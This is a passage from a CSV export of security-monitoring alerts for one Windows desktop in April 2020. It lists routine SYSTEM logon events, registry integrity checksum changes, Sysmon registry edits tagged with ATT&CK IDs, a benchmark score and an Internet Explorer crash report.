This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:39:59.594",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'ee41f99b03a77f3c189e5f458a2e0eff' +New md5sum is : '43e0f4d6dc1809edc58cbf8b28b327b4' +Old sha1sum was: 'd913a7cb81a63d409ab5ab6f958256b230345c64' +New sha1sum is : '43c975d8c59b4fde5f23a7255157fa4c078d258e' +", +"Apr 24, 2020 @ 12:39:59.578",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. 
+Old md5sum was: '304055d1dd3ac64413cbdc3e4618dc79' +New md5sum is : '3637a2390d483d94ade709712c01636c' +Old sha1sum was: '8711dfbf248032c28bd322e9c598e25a7019f2af' +New sha1sum is : 'bb81cae0ed1a0d8b5efce8411b122fd1ab66d54e' +", +"Apr 24, 2020 @ 12:39:51.816",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:39:40.592",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '5689c2dd6ed61a04cc389b6099c0aea5' +New md5sum is : '113b4cbed5989a54d95116790d0033a9' +Old sha1sum was: '64932df77c40a56e97edb3553ce359b3aaff132e' +New sha1sum is : 'bf6ddfd7385195419d1e1eeb16a780441e9e0acc' +", +"Apr 24, 2020 @ 12:39:40.264",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '5b91e535422785d7409df5362ceec530' +New md5sum is : '0447d0d52ee5a830c05fbee07043f258' +Old sha1sum was: '4e27ba555e6d427aef066e320154eafec1fd64e2' +New sha1sum is : 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +", +"Apr 24, 2020 @ 12:39:33.780",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 12:39:32.851",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:39:27.874",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:39:24.827",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcbService\NCBKapiNlmCache\4' checksum changed. +Old md5sum was: 'd3b06376b75fbbf91af26eaf1e84777f' +New md5sum is : '3e7320567909d8362377650725f71627' +Old sha1sum was: '6a70d1d8d0e8d591a19001c90000fdbb8ceb05bf' +New sha1sum is : 'd7d1983b9bab8f6a58d54df9e5ba6588f5693b81' +", +"Apr 24, 2020 @ 12:39:23.844",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:33:21Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:39:15.640",5,"The VSS service is shutting down due to idle timeout",,"""The VSS service is shutting down due to idle timeout. """ +"Apr 24, 2020 @ 12:39:13.812",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:39:12.640",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\GoogleChromeElevationService' checksum changed. +Old md5sum was: '8689e28cb67cdeb16cd0f213c561238e' +New md5sum is : '7623ffed143b7459169ba5677dbcbf32' +Old sha1sum was: '9a0d97c845587be7605acb61023bb439126934df' +New sha1sum is : '0a808618d3ad142d9f619d043ca088fdcfc9a841' +", +"Apr 24, 2020 @ 12:38:58.448",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\Chrome' checksum changed. +Old md5sum was: '5af3a18aae7113a12564a454973b2929' +New md5sum is : '22ece9a19429dc28f03e236b27d22f81' +Old sha1sum was: '0a00a2e519a32df06bc9533712e616c7a04e7c55' +New sha1sum is : 'd43b78e147f35d6834e93dded1d3c6395c512b09' +", +"Apr 24, 2020 @ 12:38:47.181",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '816e4c6e0ef2bfa0679631e42e89c389' +New md5sum is : '4dca121be9a027ca0a7d790d455bd48d' +Old sha1sum was: 'b8924f00f04db3ced0f56da547b0a3acc41c2b86' +New sha1sum is : '7c6e24ecf2f7f64b1b68cfe295a00dd26949ecd8' +", +"Apr 24, 2020 @ 12:37:15.133",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 12:37:12.023",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 12:36:44.507",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 12:36:18.272",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '271f59daf9ca28fbeb0bd234897e1662' +New md5sum is : '1af7f0914012f801bdabc07119bd84db' +Old sha1sum was: 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +New sha1sum is : '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2' +", +"Apr 24, 2020 @ 12:36:16.992",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '47f9a8fc035cc80b23dfd8be4d23cda6' +New md5sum is : '808c317f44b41ac662c03e64ae191df7' +Old sha1sum was: '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +New sha1sum is : 'cc7c06123ee56b0fe3d451e87d288d35e76cb4de' +", +"Apr 24, 2020 @ 12:36:16.977",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '480a7b1436febced63b663e198db057e' +New md5sum is : 'c6e83335e428d012cffb29f1570868b1' +Old sha1sum was: 'a366c53c7d877bd13ac0386830dbad1b52127af9' +New sha1sum is : 'e1de9238546bfb9f39c43db2beee554f6c05d8a8' +", +"Apr 24, 2020 @ 12:36:13.398",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3f376' was added. +", +"Apr 24, 2020 @ 12:36:13.368",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:36:10.929",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:36:07.425501100Z"",""eventRecordID"":""1021"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:36:07.409\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath\r\nDetails: \""C:\\Program Files (x86)\\Google\\Chrome\\Application\\81.0.4044.122\\elevation_service.exe\""\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:36:07.409"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\ImagePath"",""details"":""\\\""C:\\\\Program Files 
(x86)\\\\Google\\\\Chrome\\\\Application\\\\81.0.4044.122\\\\elevation_service.exe\\\""""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:36:07.409 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath +Details: ""C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.122\elevation_service.exe""""" +"Apr 24, 2020 @ 12:36:10.906",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:36:07.424301100Z"",""eventRecordID"":""1020"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:36:07.409\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:36:07.409"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:36:07.409 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} 
+ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:36:03.085",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '1eb44bc3df61ffb5ee9a93e1f84bbcdc' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '17394125b09262baf818402c807f15879696de6c' +", +"Apr 24, 2020 @ 12:36:03.039",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '1930b7b98646b0623c4d71c29ee5577a' +New md5sum is : 'ee41f99b03a77f3c189e5f458a2e0eff' +Old sha1sum was: '734e001445fab8494836c3ebbc7b6ed4be5733d7' +New sha1sum is : 'd913a7cb81a63d409ab5ab6f958256b230345c64' +", +"Apr 24, 2020 @ 12:36:03.018",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '08af0e89b70fc23b04544d71af2b61c5' +New md5sum is : '304055d1dd3ac64413cbdc3e4618dc79' +Old sha1sum was: 'cc74990798ae65506078b5b0d1f8cd9895cac982' +New sha1sum is : '8711dfbf248032c28bd322e9c598e25a7019f2af' +", +"Apr 24, 2020 @ 12:36:02.320",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '7b25497674cc671619a3e52c5a6b72e8' +New md5sum is : 'd157b95ae59e3c51189e40a47c1dbfb4' +Old sha1sum was: 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +New sha1sum is : '1a68895ab83f260ab600fa4471c8e2e1102a5ceb' +", +"Apr 24, 2020 @ 12:36:01.397",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:36:01.306",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. 
+ +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:36:00.498",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '030d611a72a7eb8e7814b5bdbc71252c' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'ce2026c1928b1e5b4dddcd6c8c8960d2f55deb83' +", +"Apr 24, 2020 @ 12:36:00.209",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '73ff3da5b491b534e4f1fca73d797712' +New md5sum is : '4575da043f4705e4cda975639ce4e20a' +Old sha1sum was: '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +New sha1sum is : '8b536537786ff4e6f6c150f125173760806bda04' +", +"Apr 24, 2020 @ 12:35:59.961",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:59.944",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:59.319",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'd73c739d94aff99e2de6c480608f2631' +New md5sum is : '720aee2eb36c72739680c5d0f2d3f831' +Old sha1sum was: 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +New sha1sum is : 'c10eaf675fa276de7f1560b062ddad5ad7c82d49' +", +"Apr 24, 2020 @ 12:35:59.163",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '057b39f9a279a74ae6e39c10634a6eab' +New md5sum is : '7827cdf50f1c1510f128b8c606a72a40' +Old sha1sum was: 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +New sha1sum is : '2808e60b637fd5654df187601594630e29417c14' +", +"Apr 24, 2020 @ 12:35:58.714",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:58.695",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:58.460",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '030d611a72a7eb8e7814b5bdbc71252c' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'ce2026c1928b1e5b4dddcd6c8c8960d2f55deb83' +", +"Apr 24, 2020 @ 12:35:57.381",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +", +"Apr 24, 2020 @ 12:35:56.044",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. 
+Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef' +New md5sum is : '7aee7bc72edb4bc8c3add7fdc8bb1984' +Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f' +New sha1sum is : '036d6d59a18473645e40517d1076ae9bc8dc9f38' +", +"Apr 24, 2020 @ 12:35:52.132",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 24, 2020 @ 12:35:49.881",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 24, 2020 @ 12:35:49.866",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. 
+Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '5b91e535422785d7409df5362ceec530' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : '4e27ba555e6d427aef066e320154eafec1fd64e2' +", +"Apr 24, 2020 @ 12:35:44.226",4,"Summary event of the report's signatures",,"""Fault bucket 1751705833141718957, type 1 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: iexplore.exe +P2: 11.0.18362.1 +P3: 9a0cc333 +P4: StackHash_abcc +P5: 0.0.0.0 +P6: 00000000 +P7: c0000005 +P8: PCH_0F_FROM_ntdll+0x00071F06 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BEA.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER991A.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER995A.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9967.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9988.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_iexplore.exe_e01d11a8d43b22eaaff745cb40a172102c8fbc5_e2d05f28_92ba00f4-b9ba-4a0d-9251-82f2b65a0770 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: e95a160c-287c-4dd3-b0d3-bd19323424c0 +Report Status: 268435456 +Hashed bucket: 310cd3b51d8b8eacf84f4f2c9f644fad +Cab Guid: 0""" +"Apr 24, 2020 @ 12:35:43.366",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +", +"Apr 24, 2020 @ 12:35:42.898",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:32:40Z. 
Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:35:41.309",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:41.302",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:40.473",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:40.449",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:39.304",9,"Windows Application error event",,"""Faulting application name: iexplore.exe, version: 11.0.18362.1, time stamp: 0x9a0cc333 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x31007f9d +Faulting process id: 0x1ad8 +Faulting application start time: 0x01d61a34daaec983 +Faulting application path: C:\Program Files (x86)\Internet Explorer\iexplore.exe +Faulting module path: unknown +Report Id: e95a160c-287c-4dd3-b0d3-bd19323424c0 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 24, 2020 @ 12:35:38.866",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information 